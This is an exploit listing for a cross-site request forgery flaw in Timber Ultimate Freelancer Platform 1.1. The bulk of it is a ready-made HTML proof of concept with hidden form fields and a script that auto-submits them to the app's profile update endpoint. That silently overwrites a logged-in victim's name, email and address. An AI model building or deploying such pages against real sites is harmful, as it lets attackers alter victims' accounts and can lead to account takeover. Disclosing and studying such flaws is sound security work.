Timber version 1.1 suffers from a cross site request forgery vulnerability.
98125c64ad8f40b05398adc5800e2dcda0ab9d8c496cb8cbce6e95222d1a2baf
# Exploit Title: Timber - Ultimate Freelancer Platform 1.1 - Cross site request forgery
# Date: 2018-05-24
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
# Version: 1.1
# Tested on: Kali linux
=========================================
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="https://test.com/timber/request/backend/ajax/profile/update_user_profile" method="POST">
<input type="hidden" name="user_nonce" value="e748717abd" />
<input type="hidden" name="profile_avatar" value="" />
<input type="hidden" name="first_name" value="decode" />
<input type="hidden" name="last_name" value="lord" />
<input type="hidden" name="user_name" value="test" />
<input type="hidden" name="job" value="Marketing Specialist" />
<input type="hidden" name="company" value="Envato" />
<input type="hidden" name="email" value="lord@decode.com" />
<input type="hidden" name="website" value="https://envato.com" />
<input type="hidden" name="language" value="en_US" />
<input type="hidden" name="phone_num" value="+33 (0)1 42 68 53 00" />
<input type="hidden" name="country" value="FR" />
<input type="hidden" name="city" value="Paris" />
<input type="hidden" name="address1" value="8 Rue de Londres" />
<input type="hidden" name="address2" value="75009 test" />
<input type="hidden" name="zip_code" value="" />
<input type="hidden" name="vat_nubmer" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
==========================================